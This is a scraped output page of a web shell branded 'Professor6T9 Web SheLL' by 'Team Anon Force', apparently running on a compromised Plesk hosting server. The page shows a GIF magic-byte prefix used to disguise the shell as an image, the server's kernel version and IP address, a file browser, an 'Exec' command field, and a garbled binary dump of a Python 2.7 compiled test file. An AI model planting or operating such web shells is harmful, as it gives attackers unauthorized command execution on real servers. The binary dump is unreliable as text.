GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux s2.soul-hosting.hu 5.10.0-35-amd64 #1 SMP Debian 5.10.237-1 (2025-05-19) x86_64
Apache
173.212.232.101
/
opt
/
plesk
/
python
/
2.7
/
lib
/
python2.7
/
test
[ HOME ]
Exec
Submit
test_htmlparser.pyc
� 5}�ac @ s� d Z d d l Z d d l Z d d l Z d d l m Z d e j f d � � YZ d e f d � � YZ d e j f d � � YZ d e f d � � YZ d e f d � � YZ d � Z e d k r� e � n d S( s Tests for HTMLParser.py.i����N( t test_supportt EventCollectorc B st e Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z RS( c C s, g | _ | j j | _ t j j | � d S( N( t eventst appendt HTMLParsert __init__( t self( ( s; /opt/plesk/python/2.7/lib/python2.7/test/test_htmlparser.pyR s c C s� g } d } xm | j D]b } | d } | | k o= d k n re d | d d | d f | d <n | j | � | } q W| | _ | S( Ni t datai����i ( t NoneR R ( R t Lt prevtypet eventt type( ( s; /opt/plesk/python/2.7/lib/python2.7/test/test_htmlparser.pyt get_events s # c C s | j d | | f � d S( Nt starttag( R ( R t tagt attrs( ( s; /opt/plesk/python/2.7/lib/python2.7/test/test_htmlparser.pyt handle_starttag! s c C s | j d | | f � d S( Nt startendtag( R ( R R R ( ( s; /opt/plesk/python/2.7/lib/python2.7/test/test_htmlparser.pyt handle_startendtag$ s c C s | j d | f � d S( Nt endtag( R ( R R ( ( s; /opt/plesk/python/2.7/lib/python2.7/test/test_htmlparser.pyt handle_endtag'